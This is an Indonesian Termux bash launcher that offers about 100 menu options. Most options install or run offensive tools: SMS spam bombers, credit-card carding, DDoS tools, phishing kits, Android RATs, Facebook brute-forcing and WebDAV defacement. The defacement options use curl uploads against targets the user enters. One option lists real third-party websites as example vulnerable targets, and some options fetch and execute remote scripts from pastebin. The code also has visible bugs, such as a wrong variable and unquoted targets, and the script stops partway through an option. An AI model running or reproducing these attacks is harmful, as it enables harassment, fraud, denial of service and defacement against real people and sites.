#/data/data/com.termux/files/usr/bin/bash

clear
#colors
cyan='\033[1;36m'
green='\033[1;32m'
red='\033[1;31m'
yellow='\033[1;33m'
blue='\033[1;34m'
purple='\033[1;35m'
reset='\033[0m'
sleep 1
toilet -f big -F gay "T00Ls" | lolcat
toilet -f big -F gay "KZy29" 
echo""
echo $green "Author : MR.KZY" 
echo $blue "Team : BLACK CYBER CRUSH"
echo $yellow "Kontak Me :  0888-0984-3498"
echo $red "support : JUNIOR GUARDIAN TEAM AND CC4"
echo "$green============================[>"
sleep 1
echo ""
echo $blue "Silahkan Pilih Tools Yang mau Kamu pake:)?:"
echo "[===============================================[>"
echo $green "1.> Spam Sms Tokopedia"
echo "[===============================================]>"
echo $purple "2.> Spam Sms Telkomnyet"
echo "[===============================================]>"
echo $cyan "3.> Spam Sms Matahari Mall"
echo "[===============================================]>"
echo $red "4.> Spam Sms HooqTV"
echo "[===============================================]>"
echo $white "5.> Spam Sms KFC"
echo "[===============================================]>"
echo $green "6.> Spam Sms PHD"
echo "[===============================================]>"
echo $purple "7.> Spam Sms Whiskas"
echo "[===============================================]>"
echo $cyan "8.> Spam Sms ZiPAY"
echo "[===============================================]>"
echo $red "9.> Nyari CC buat Carding"
echo "[===============================================]>"
echo $white "10.> Spam Akun Gmail"
echo "[===============================================]>"
echo $green "11.> Whois LookUp"
echo "[===============================================]>"
echo $purple "12.> Upload Admin Finder"
echo "[===============================================]>"
echo $cyan "13.> Script Deface Creator"
echo "[===============================================]>"
echo $red "14.> ReConDog Buat Information gathering"
echo "[===============================================]>"
echo $white "15.> Admin Login Finder"
echo "[===============================================]>"
echo $green "16.> Virus VbugMaker Creator"
echo "[===============================================]>"
echo $purple "17.> dowload script deface orang"
echo "[===============================================]>"
echo $cyan "18.> Autolike Facebook"
echo "[===============================================]>"
echo $red "19.> Facebook Auto_Reaction"
echo "[===============================================]>"
echo $white "20.> Bot Komentar Facebook"
echo "[===============================================]>"
echo $green "21.> Install txtool"
echo "[===============================================]>"
echo $purple "22.> install sqlscan"
echo "[===============================================]>"
echo $cyan "23.> install hash-buster"
echo "[===============================================]>"
echo $red "24.> Install Red_Hawk"
echo "[===============================================]>"
echo $white "25.> Install Torshammer buat DDOS website"
echo "[===============================================]>"
echo $green "26.> Install LITEDDOS buat DDOS website"
echo "[===============================================]>"
echo $purple "27.> Install Hunner Framework"
echo "[===============================================]>"
echo $cyan "28.> Install Sqlmap Buat Inject Situs"
echo "[===============================================]>"
echo $red "29.> Install 4wsectools"
echo "[===============================================]>"
echo $white "30.> Install Lazymux Buat Install Tools"
echo "[===============================================]>"
echo $green "31.> Mempercepat / Menstabilkan Jaringan/sinyal"
echo "[===============================================]>"
echo $purple "32.> Mempercepat / menstabilkan jaringan 2"
echo "[===============================================]>"
echo $cyan "33.> Install BinGoo"
echo "[===============================================]>"
echo $red "34.> Full Bot Facebook"
echo "[===============================================]>"
echo $white "35.> Install Termux-A"
echo "[===============================================]>"
echo $green "36.> Install Tools GadoGado"
echo "[===============================================]>"
echo $purple "37.> Install Lazysqlmap"
echo "[===============================================]>"
echo $cyan "38.> Install tools diejoubu"
echo "[===============================================]>"
echo $red "39.> Install weeman Buat Phising"
echo "[===============================================]>"
echo $white "40.> Install iesDEFACE buat Deface Poc Webdav"
echo "[===============================================]>"
echo $green "41.> install errorcybertools"
echo "[===============================================]>"
echo $purple "42.> install A-Rat untuk Retas Android"
echo "[===============================================]>"
echo $cyan "43.> Scan-Website-Admin-Login"
echo "[===============================================]>"
echo $red "44.> DEFACE metode Webdav"
echo "[===============================================]>"
echo $white "45.> Tools Katoolin"
echo "[===============================================]>"
echo $green "46.> Main Tebak2 kan:v biar ga bt:v"
echo "[===============================================]>"
echo $purple "47.> Brute DEFACE webdav"
echo "[===============================================]>"
echo $cyan "48.> Browsing Di Termux"
echo "[===============================================]>"
echo $red "49.> Dengerin Lagu Youtube di Termux"
echo "[===============================================]>"
echo $white "50.> Tebak Tebak Kan Soal Cinta Tod" 
echo "[===============================================]>"
echo $green "51.> Nuyul Bitcoin"
echo "[===============================================]>"
echo $purple "52.> Install MetaSploit"
echo "[===============================================]>"
echo $cyan "53.> MultiBrute Force Facebook Buat Hack Facebook"
echo "[===============================================]>"
echo $red "54.> install WAScan"
echo "[===============================================]>"
echo $white "55.> install MultiSpam [Sms]"
echo "[===============================================]>"
echo $green "56.> Spam Sms Jd.id"
echo "[===============================================]>"
echo $purple "57.> DDOS xerxes"
echo "[===============================================]>"
echo $cyan "58.> IPGeoLocation Buat Lacak IP"
echo "[===============================================]>"
echo $red "59.> Install viSQL"
echo "[===============================================]>"
echo $white "60.> Install Kawai-Botnet Buat DDOS"
echo "[===============================================]>"
echo $green "61.> Install OWScan"
echo "[===============================================]>"
echo $purple "62.> Install AstraNmap"
echo "[===============================================]>"
echo $cyan "63.> Install Auxscan2.0"
echo "[===============================================]>"
echo $red "64.> Install Black-Hydra"
echo "[===============================================]>"
echo $white "65.> Install Ipddos"
echo "[===============================================]>"
echo $green "66.> Install hasher"
echo "[===============================================]>"
echo $purple "67.> Install PhisingGame Buat Hack ML & COC"
echo "[===============================================]>"
echo $cyan "68.> Kumpulan Tutorial Termux"
echo "[===============================================]>"
echo $red "69.> Chating Di Termux"
echo "[===============================================]>"
echo $white "70.> Cari Panel Login Admin Pakai Breacer"
echo "[===============================================]>"
echo $green "71.> Install SocialFish Buat Phising"
echo "[===============================================]>"
echo $purple "72.> Install MoonBuggy Buat Main Game"
echo "[===============================================]>"
echo $cyan "73.> Install Cupp Buat Worldlist Tertarget"
echo "[===============================================]>"
echo $red "74.> Install Hydra"
echo "[===============================================]>"
echo $white "75.> Install md5-crack"
echo "[===============================================]>"
echo $green "76.> Install LITESPAM Buat Spam"
echo "[===============================================]>"
echo $purple "77.> Mulung Bitcoin"
echo "[===============================================]>"
echo $cyan "78.> Install Ko-Dork"
echo "[===============================================]>"
echo $red "79.> Lihat Spesifikasi Ponsel"
echo "[===============================================]>"
echo $white "80.> install lhst"
echo "[===============================================]>"
echo $green "81.> Install The Fat Rat"
echo "[===============================================]>"
echo $purple "82.> Install CMSmap"
echo "[===============================================]>"
echo $cyan "83.> Install Kali Ubuntu"
echo "[===============================================]>"
echo $red "84.> Install Ngrok"
echo "[===============================================]>"
echo $white "85.> Install Brute Force Gmail"
echo "[===============================================]>"
echo $green "86.> Install Lokomedia Exploiters"
echo "[===============================================]>"
echo $purple "87.> Install Kali Linux Nethunter"
echo "[===============================================]>"
echo $cyan "88.> Install joomscan"
echo "[===============================================]>"
echo $red "89.> Install VulnScaner"
echo "[===============================================]>"
echo $white "90.> Install HN-Installer"
echo "[===============================================]>"
echo $green "91.> Install Fucking-Rat"
echo "[===============================================]>"
echo $cyan "92.> Install linux fedora"
echo "[===============================================]>"
echo $red "93.> Install information Gathering"
echo "[===============================================]>"
echo $blue "94.> Install ezsploit [Harus Root]"
echo "[===============================================]>"
echo $white "95.> Install Dirsearch "
echo "[===============================================]>"
echo $red "96.> Install honeypot"
echo "[===============================================]>"
echo $cyan "97.> Install Killr"
echo "[===============================================]>"
echo $blue "98.> Install Human_Level_Control"
echo "[===============================================]>"
echo $green "99.> Install Termux-Mpv"
echo "[===============================================]>"
echo $purple "100.> Install OWASP-Nettacker"
echo "[===============================================]>"
echo $yellow "0.> keluar"
echo "[===============================================]>"
echo
read -p "[silahkan pilih:=>" kzy;

if [ $kzy = 1 ] || [ $kzy = 1 ]
then
clear
figlet "KZy29" | lolcat
cd module
php tp.php
fi

if
[ $kzy = 2 ] || [ $kzy = 2 ]
then
clear
toilet "KZy29"
cd module
php t.php
fi

if [ $kzy = 3 ] || [ $kzy = 3 ]
then
figlet "KZy29"
cd module
php mataharimall.php
fi

if [ $kzy = 4 ] || [ $kzy = 4 ]
then
clear
toilet "KZy29"
cd module
php hooq.php
fi

if [ $kzy = 5 ] || [ $kzy = 5 ]
then
clear
toilet -f slant --gay "KZy29"
cd module
php kfc.php
fi

if [ $kzy = 6 ] || [ $kzy = 6 ]
then
clear
toilet -f mono12 -F gay "KZy29"
cd module
php phd.php
fi

if [ $kzy = 7 ] || [ $kzy = 7 ]
then
clear
toilet "KZy29"
cd module
php whiskas.php
fi

if [ $kzy = 8 ] || [ $kzy = 8 ]
then
clear
figlet "KZy29"
cd module
php zipay.php
fi

if [ $kzy = 9 ] || [ $kzy = 9 ]
then
clear
toilet "KZy29"
cd module
php key.php
fi

if [ $kzy = 10 ] || [ $kzy = 10 ]
then
clear
toilet "KZy29"
cd module
python2 SpamMail.py
fi

if [ $kzy = 11 ] || [ $kzy = 11 ]
then
clear
toilet "KZy29"
cd module
python2 whs.py
fi

if [ $kzy = 12 ] || [ $kzy = 12 ]
then
clear
toilet "KZy29"
cd module
python2 upf.py
fi

if [ $kzy = 13 ] || [ $kzy = 13 ]
then
clear
toilet "KZy29"
cd module
python2 create.py
fi

if [ $kzy = 14 ] || [ $kzy = 14 ]
then
clear
toilet "KZy29"
cd module
python2 dog.py
fi

if [ $kzy = 15 ] || [ $kzy = 15 ]
then
clear
toilet "KZy29"
cd module
python2 gam.py
fi

if [ $kzy = 16 ] || [ $kzy = 16 ]
then
clear
toilet "KZy29"
cd module
python2 anvima.py
fi

if [ $kzy = 17 ] || [ $kzy = 17 ]
then
clear
toilet "KZy29"
cd module
python2 htmd.py
fi

if [ $kzy = 18 ] || [ $kzy = 18 ]
then
clear
toilet "KZy29"
cd module
php autolike.php
fi

if [ $kzy = 19 ] || [ $kzy = 19 ]
then
clear
toilet "KZy29"
cd module
python2 auto_reaction.py
fi

if [ $kzy = 20 ] || [ $kzy = 20 ]
then
clear
figlet "KZy29" | lolcat
cd module
python2 botkomen.py
fi

if [ $kzy = 21 ] || [ $kzy = 21 ]
then
clear
figlet "KZy29" | lolcat
git clone https://github.com/kuburan/txtool
mv txtool $HOME
cd $HOME/txtool
python2 install.py
python2 update.py
txtool
fi


if [ $kzy = 22 ] || [ $kzy = 22 ]
then
clear
toilet -f slant -F gay "KZy29" 
pkg install update && pkg install upgrade
pkg install git
pkg install php
cd module
php sqlscan.php
fi

if [ $kzy = 23 ] || [ $kzy = 23 ]
then
clear
toilet -f mono12 -F gay "KZy29" 
apt upgrade
apt install python2
apt install git
git clone https://github.com/UltimateHackers/Hash-Buster
mv Hash-Buster $HOME
cd $HOME/Hash-Buster
python2 hash.py
fi

if [ $kzy = 24 ] || [ $kzy = 24 ]
then
clear
toilet -f standard -F gay "KZy29" 
echo "\033[33;1muntuk tutorial kunjungi:" "\033[36;1m https://youtu.be/h2I5HU3W-so"
sleep 3
apt update
apt install git
apt install php
git clone https://github.com/Tuhinshubhra/RED_HAWK
mv RED_HAWK $HOME
cd $HOME/RED_HAWK
chmod +x rhawk.php
php rhawk.php
fi

if [ $kzy = 25 ] || [ $kzy = 25 ]
then
clear
toilet -f standard -F gay "KZy29" 
apt update
apt install git
apt install tor
git clone https://github.com/dotfighter/torshammer.git
mv torshammer $HOME
cd $HOME/torshammer
read -p "Masukan Target==>:" target
python2 torshammer.py -T -t target
fi

if [ $kzy = 26 ] || [ $kzy = 26 ]
then
clear
toilet -f standard -F gay "KZy29" 
echo "\033[33;1muntuk tutorial kunjungi:" "\033[36;1m https://youtu.be/EskgepQSB7U"
sleep 3
apt update
apt install git
git clone https://github.com/4L13199/LITEDDOS
mv LITEDDOS $HOME
cd $HOME/LITEDDOS
read -p "MasukanTarget:" target
python2 LITEDDOS.py target 80 100
fi

if [ $kzy = 27  || [ $kzy = 27 ]
then
clear
toilet -f standard -F gay "KZy29" 
apt update
apt install git
git clone https://github.com/b3-v3r/Hunner.git
mv Hunner $HOME
cd $HOME/Hunner
chmod +x hunner.py
python2 hunner.py
fi

if [ $kzy = 28 ] || [ $kzy = 28 ]
then
clear
toilet -f standard -F gay "KZy29"
apt update
apt install git
git clone https://github.com/sqlmapproject/sqlmap
mv sqlmap $HOME
cd $HOME/sqlmap
read -p "masukan web target:" target
python2 sqlmap.py -D target
fi

if [ $kzy = 29 ] || [ $kzy = 29 ]
then
clear
toilet -f standard -F gay "KZy29" 
apt update
apt install git
git clone https://github.com/aryanrtm/4wsectools
mv 4wsectools $HOME
cd $HOME/4wsectools
chmod 777 tools
./tools
fi

if [ $kzy = 30 ] || [ $kzy = 30 ]
then
clear
figlet "KZy29" | lolcat
apt update && upgrade
apt install python2 
apt install git
cd module
python2 lazymux.py
fi

if [ $kzy = 31 ] || [ $kzy = 31 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
echo "$blue====================Mempercepat / menstabilkan sinyal===================="
sleep 1
echo "$red================================By KZy29================================"
sleep 1
echo ""
echo ""
ping 8.8.8.8 
fi

if [ $kzy = 32 ] || [ $kzy = 32 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
echo "$blue===================Mempercepat / menstabilkan sinyal 2===================="
sleep 1
echo "$red================================By KZy29================================"
sleep 1
echo ""
echo ""
ping -D www.google.com
fi

if [ $kzy = 33 ] || [ $kzy = 33 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
git clone https://github.com/Hood3dRob1n/BinGoo
mv BinGoo $HOME
cd $HOME/BinGoo
bash bingoo
fi

if [ $kzy = 34 ] || [ $kzy = 34 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
cd module
python2 facebook.py
fi

if [ $kzy = 35 ] || [ $kzy = 35 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install termux-api
apt install git
apt install php
git clone https://github.com/Cvar1984/Termux-A.git
mv Termux-A $HOME
cd $HOME/Termux-A
php run.php
fi

if [ $kzy = 36 ] || [ $kzy = 36 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install ruby
apt install lolcat
apt install git
git clone https://github.com/Senitopeng/GadoGado.git
mv GadoGado $HOME
cd $HOME/GadoGado
bash gado
fi

if [ $kzy = 37 ] || [ $kzy = 37 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install python2
apt install git
git clone https://github.com/verluchie/termux-lazysqlmap.git
mv termux-lazysqlmap $HOME
cd $HOME/termux-lazysqlmap
chmod 777 install.sh
./install.sh
lazysqlmap
fi

if [ $kzy = 38 ] || [ $kzy = 38 ]
then
clear
figlet "KZy29" | lolcat
sleep 1 
apt install git
apt install php
git clone https://github.com/alintamvanz/diejoubu
mv diejoubu $HOME
cd $HOME/diejoubu
cd v1.2
php diejoubu.php
fi

if [ $kzy = 39 ] || [ $kzy = 39 ]
then
clear
figlet "KZy29" | lolcat
sleep 1 
apt install git
apt install php
git clone https://github.com/evait-security/weeman.git
mv weeman $HOME
cd $HOME/weeman
python2 weeman.py
fi

if [ $kzy = 40 ] || [ $kzy = 40 ]
then
clear
figlet "KZy29" | lolcat
sleep 1 
apt install git
apt install bash
pip2 install bash
git clone https://github.com/ALX-04/iesDEFACE
mv iesDEFACE $HOME
cd $HOME/iesDEFACE
bash iesDeface.sh
fi

if [ $kzy = 41 ] || [ $kzy = 41 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
git clone https://github.com/MrKeepSmile/errorcybertool.git
mv errorcybertool $HOME
cd $HOME/errorcybertool
chmod 777 errorcyber
./errorcyber
fi

if [ $kzy = 42 ] || [ $kzy = 42 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
git clone https://github.com/Xi4u7/A-Rat.git
mv A-Rat $HOME
cd $HOME/A-Rat
python2 A-Rat.py
fi

if [ $kzy = 43 ] || [ $kzy = 43 ]
then
clear
figlet "KZy29" | lolcat
sleep 1
git clone https://github.com/DarknessCyberTeam/Scan-Website-Admin-Login
mv Scan-Website-Admin-Login $HOME
cd $HOME/Scan-Website-Admin-Login
python2 Admin-Login.py
fi

if [ $kzy = 44 ] || [ $kzy = 44 ]
then
clear
echo "\033[34;1m"
cowsay -f kiss.cow "KZy29" | lolcat
figlet -f slant KZy29
echo "\033[37;1m"
echo "Masukan Web target"
echo "Contoh Web Target vuln"
echo "	http://bestilling.udir.no/"
echo "	http://560560.ru/"
echo "	http://myownemailer.com/"
echo "	http://Zoocentral.co.za/"
echo "	http://50-50-50.ru/"
echo "	http://tirupurjobs.net/"
echo "	http://Matrimony.co.za/"
echo "	http://Bheh.co.za/"
read -p "[KZy29]>" target
echo "Masukan Nama script kalian"
echo "yang ada di Luar Folder Ruang Penyimpanan"
read -p "[KZy29]>" script
curl -T /storage/emulated/0/$script $target
echo "\033[33;1m"
echo "Selesai! Cek di $target $script "
fi

if [ $kzy = 45 ] || [ $kzy = 45 ]
then
clear
cowsay -f sheep.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
cd
cd module
python2 katoolin.py
fi

if [ $kzy = 46 ] || [ $kzy = 46 ]
then
clear
cowsay -f kiss.cow "KZy" | lolcat
figlet "KZy29" | lolcat
sleep 1
cd module
python2 r.py
fi

if [ $kzy = 47 ] || [ $kzy = 47 ]
then
clear
toilet -f standard -F gay "BruteWebdav"
echo "\033[32;1mauthor: MR.KZY"
echo "\033[33;1mTeam: BLACK CYBER CRUSH
echo "\033[34;1msupport : JUNIOR GUARDIAN TEAM"
echo "Masukan nama script"
read -p "[=======>" script
echo "\033[32;1m"
echo "Masukan Web Target Ke1"
read -p "[=======>" Ke1
curl -T /storage/emulated/0/$script $Ke1
echo "\033[32;1m" "Masukan Web Target Ke2 "
read -p "[=======>" Ke2
curl -T /storage/emulated/0/$script $Ke2
echo "\033[32;1m" "Masukan Web Target Ke3"
read -p "[=======>" Ke3
curl -T /storage/emulated/0/$script $Ke3
echo "\033[32;1m" "Masukan Web Target Ke4"
read -p "[=======>" Ke4
curl -T /storage/emulated/0/$script $Ke5
echo "\033[32;1m" "Masukan Web Target Ke5"
read -p "[=======>" Ke5
curl -T /storage/emulated/0/$script $Ke5
echo "\033[32;1m" "Masukan Web Target Ke6"
read -p "[=======>" Ke6
curl -T /storage/emulated/0/$script $Ke6
echo "\033[32;1m" "Masukan Web Target Ke7"
read -p "[=======>" Ke7
curl -T /storage/emulated/0/$script $Ke7
echo "\033[32;1m" "Masukan Web Target Ke8"
read -p "[=======>" Ke8
curl -T /storage/emulated/0/$script $Ke8
echo "\033[32;1m" "Masukan Web Target Ke9"
read -p "[=======>" Ke9
curl -T /storage/emulated/0/$script $Ke9
echo "\033[32;1m" "Masukan Web Target Ke10"
read -p "[=======>" Ke10
curl -T /storage/emulated/0/$script $Ke10
sleep 1
echo "[<=====================SEDANG PROSES=====================>]"
echo "Silahkan Cek Web $Ke1/$script"
echo "Silahkan Cek Web $Ke2/$script"
echo "Silahkan Cek Web $Ke3/$script"
echo "Silahkan Cek Web $Ke4/$script"
echo "Silahkan Cek Web $Ke5/$script"
echo "Silahkan Cek Web $Ke6/$script"
echo "Silahkan Cek Web $Ke7/$script"
echo "Silahkan Cek Web $Ke8/$script"
echo "Silahkan Cek Web $Ke9/$script"
echo "Silahkan Cek Web $Ke10/$script"
echo "[=============HAPPY DEFACE=============]"
fi

if [ $kzy = 48 ] || [ $kzy = 48 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
pkg install w3m
w3m www.google.com
fi

if [ $kzy = 49 ] || [ $kzy = 49 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install pip
pkg install python
pkg install python2
pip install mps_youtube
pip install youtube_dl
pkg install mpv
mpsyt
fi

if [ $kzy = 50 ] || [ $kzy = 50 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
cd module
python2 cinta.py
fi

if [ $kzy = 51 ] || [ $kzy = 51 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
pkg install php
pkg install wget
wget -O tuyul.php https://pastebin.com/raw/3ERZV3nL
mv tuyul.php $HOME
php $HOME/tuyul.php
fi

if [ $kzy = 52 ] || [ $kzy = 52 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
pkg install curl
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
./metasploit.sh
echo "\033[33;1muntuk tutorial penggunaan metasploit kunjungi:" "\033[36;1m https://www.youtube.com/playlist?list=PL4qheylYxmKwZI_XudHORnc-9bha7Y8qw"
sleep 5
mv metasploit-framework $HOME
cd $HOME/metasploit-framework
./msfconsole
fi

if [ $kzy = 53 ] || [ $kzy = 53 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
echo "\033[33;1muntuk tutorial kunjungi:" "\033[36;1m https://youtu.be/FsI4pCapfLY"
sleep 3
cd module
python2 mbf.py
fi

if [ $kzy = 54 ] || [ $kzy = 54 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install python2
apt install git
pip2 install -r requirements.txt
git clone https://github.com/m4II0k/WAScan.git
mv WAScan $HOME
cd $HOME/WAScan
pip2 install -r requirements.txt
clear
chmod +x wascan.py
python2 wascan.py 
fi

if [ $kzy = 55 ] || [ $kzy = 55 ]
then
clear
echo "\033[31;1m"
cowsay ghostbusters.cow "KZy29" 
figlet "KZy29" | lolcat
apt update && apt upgrade
apt install python2
apt install python
apt install git
git clone https://github.com/Kereh/MultiSpam
mv MultiSpam $HOME
cd $HOME/MultiSpam
read -p "==== nomer target awalan [62] contoh 628xxxx===>" target
python2 Multispam.py --count=1000 target
sleep 1
fi

if [ $kzy = 56 ] || [ $kzy= 56 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt install php
apt install curl
curl https://pastebin.com/raw/9BYy1JVc -o jdid.php
mv jdid.php $HOME
cd $HOME
php jdid.php
fi

if [ $kzy = 57 ] || [ $kzy = 57 ]
then
clear
toilet -f slant --gay "KZy29"
apt update && apt upgrade
apt install git
apt install clang
git clone https://github.com/zanyarjamal/xerxes
mv xerxes $HOME
cd $HOME/xerxes
clang xerxes.c -o xerxes
clear
read -p "[masukanWebsiteTarget]>" target
./xerxes target 80
fi

if [ $kzy = 58 ] || [ $kzy = 58 ]
then
clear
figlet "KZy29" | lolcat
echo "\033[33;1muntuk tutorial kunjungi:" "\033[36;1mhttps://youtu.be/VuCvj-8JIME"
sleep 3
apt install git
apt install python
apt install python2
git clone https://github.com/maldevel/IPGeoLocation.git
mv IPGeoLocation $HOME
cd $HOME/IPGeoLocation
chmod +x ipgeoLocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
read -p "[Masukan IP/website]>" target
python ipgeolocation.py -t target
fi

if [ $kzy = 59 ] || [ $kzy = 59 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install python2
apt install git
git clone https://github.com/blackvkng/viSQL
mv viSQL $HOME
cd $HOME/viSQL
python2 -m pip install -r requirements.txt
python2 viSQL.py
read -p "[Masukan Website Target]>" target
python2 viSQL.py -t target
fi

if [ $kzy = 60 ] || [ $kzy = 60 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install php
apt install git
git clone https://github.com/Cvar1984/Kawai-Botnet
mv Kawai-Botnet $HOME
cd $HOME/Kawai-Botnet
read -p "[Masukan Website Target]>:" target
php kawai.php target 4 0 9999
fi

if [ $kzy = 61 ] || [ $kzy = 61 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install php
git clone https://github.com/Gameye98/OWScan.git
mv OWScan $HOME
cd $HOME/OWScan
php owscan.php
fi

if [ $kzy = 62 ] || [ $kzy = 62 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install sh
pip2 install sh
git clone https://github.com/Gameye98/AstraNmap
mv AstraNmap $HOME
cd $HOME/AstraNmap
sh astranmap.sh
fi

if [ $kzy = 63 ] || [ $kzy = 63 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install python
apt install python2
git clone https://github.com/Gameye98/Auxscan2.0.git
mv Auxscan2.0 $HOME
cd $HOME/Auxscan2.0
python2 auxscan.py
fi

if [ $kzy = 64 ] || [ $kzy = 64 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install python
apt install python2
git clone https://github.com/Gameye98/Black-Hydra.git
mv Black-Hydra $HOME
cd $HOME/Black-Hydra
python2 blackhydra.py
fi

if [ $kzy = 65 ] || [ $kzy = 65 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install python
apt install python2
git clone https://github.com/CiKu370/ipddos.git
mv ipddos $HOME
cd $HOME/ipddos
echo "[Ddos Pake Ip + port]"
echo "[Contoh 127.x.x.x 8080]"
read -p "[Masukan Ip dan port]=>:" target 
python2 ipddos.py target 
fi

if [ $kzy = 66 ] || [ $kzy = 66 ]
then
clear
cowsay -f kiss.cow "KZy29" | lolcat
figlet "KZy29" | lolcat
sleep 1
apt update && apt upgrade
apt install git
apt install python
apt install python2
git clone https://github.com/CiKu370/hasher.git
mv hasher $HOME
cd $HOME/hasher
python2 hash.py 
fi

if [ $kzy = 67 ] || [ $kzy = 67 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1muntuk tutorial kunjungi:" "\033[36;1m https://youtu.be/qJc1KaD3QcQ"
sleep 5
pkg install git
pkg install python2
git clone https://github.com/senitopeng/PhisingGame.git
mv PhisingGame $HOME
cd $HOME/PhisingGame
python2 phising.py
fi

if [ $kzy = 68 ] || [ $kzy = 68 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "Copy Link nya => Paste Ke Browser"

echo "\033[33;1mCara Hack Facebook Di Termux:" "\033[36;1m https://youtu.be/FsI4pCapfLY"

echo "\033[33;1mCara Hack ML & COC:" "\033[36;1mhttps://youtu.be/qJc1KaD3QcQ"

echo "\033[33;1mCara Phising Di Termux:" "\033[36;1mhttps://youtu.be/LU0QMstAI88"

echo "\033[33;1mCara Membuat Virus Seperti Asli:" "\033[36;1mhttps://youtu.be/efIhyTJiR00"

echo "\033[33;1mCara Pindah Ke Shell Fish:" "\033[36;1mhttps://youtu.be/cEBsXHkOco0"

echo "\033[33;1mCara Sadap SMS Di Termux:" "\033[36;1mhttps://youtu.be/jQlZg6afZ-Y"

echo "\033[33;1mBelajar Bahasa Pemrograman Bash:" "\033[36;1mhttps://youtu.be/66lkSQ3ZEvE"

echo "\033[33;1mBelajar Bahasa Pemrograman Bash 2:" "\033[36;1mhttps://youtu.be/Gy1J_aMquPY"

echo "\033[33;1mCara Sadap HP Di Termux:" "\033[36;1mhttps://youtu.be/n9mlAWTLMXQ"

echo "\033[33;1mCara Browsingan Di Termux:" "\033[36;1mhttps://youtu.be/3sGnqhiwpDM"

echo "\033[33;1mCara Chatingan Di Termux:" "\033[36;1mhttps://youtu.be/Us11rFsJb7A"

echo "\033[33;1mCara Hack CCTV Di Termux:" "\033[36;1mhttps://youtu.be/WliwxqNfefc"

echo "\033[33;1mCara Install Ngrok Di Termux:" "\033[36;1mhttps://youtu.be/ec0M1Rpoh6I"

echo "\033[33;1mCara Mempercantik Termux:" "\033[36;1mhttps://youtu.be/CpQBfiffAjw"

echo "\033[33;1mCara Mencari Admin Login Di Termux:" "\033[36;1mhttps://youtu.be/mLAt3jsOn18"

echo "\033[33;1mCara Membuat Cowsay Sendiri:" "\033[36;1mhttps://youtu.be/PleMF82Mcgs"

echo "\033[33;1mCara Setel Musik Di Termux:" "\033[36;1mhttps://youtu.be/lo8wqVOjbVw"

echo "\033[33;1mCara Encrypt Tools Python Di Termux:" "\033[36;1mhttps://youtu.be/-HyU7NZVDd8"

echo "\033[33;1mCara Update Status Di Termux:" "\033[36;1mhttps://youtu.be/l9G3QHf6w5s"

echo "\033[33;1mCara Cek Link DeepWeb Di Termux:" "\033[36;1mhttps://youtu.be/8-zFNfMG-Ho"

echo "\033[33;1mCara Menampilkan Animasi Di Termux:" "\033[36;1mhttps://youtu.be/FJF-PIwa0sI"

echo "\033[33;1mCara Menggunakan A-Rat Di Termux:" "\033[36;1mhttps://youtu.be/tx7ykJrqULQ"

echo "\033[33;1mInstall Spammer Grab Terbaru:" "\033[36;1mhttps://youtu.be/z5qVr--gCM8"

echo "\033[33;1mCara Scan Situs Di Termux:" "\033[36;1mhttps://youtu.be/h2I5HU3W-so"

echo "\033[33;1mCara DDOS Di Termux:" "\033[36;1mhttps://youtu.be/EskgepQSB7U"
fi

if [ $kzy = 69 ] || [ $kzy = 69 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/Us11rFsJb7A"
sleep 5
pkg install irssi
irssi
fi

if [ $kzy = 70 ] || [ $kzy = 70 ]
then
clear
toilet -f standard -F gay "KZy29"
echo "\033[33;1mUntuk Tutorial Kunjungi:" "\033[36;1mhttps://youtu.be/nw9_ECb8VQA"
sleep 5
pkg install python2
pkg install git
git clone https://github.com/UltimateHackers/Breacher.git
mv Breacher $HOME
cd $HOME/Breacher
python2 breacher.py
fi

if [ $kzy = 71 ] || [ $kzy = 71 ]
then
clear
toilet -f standard -F gay "KZy29"
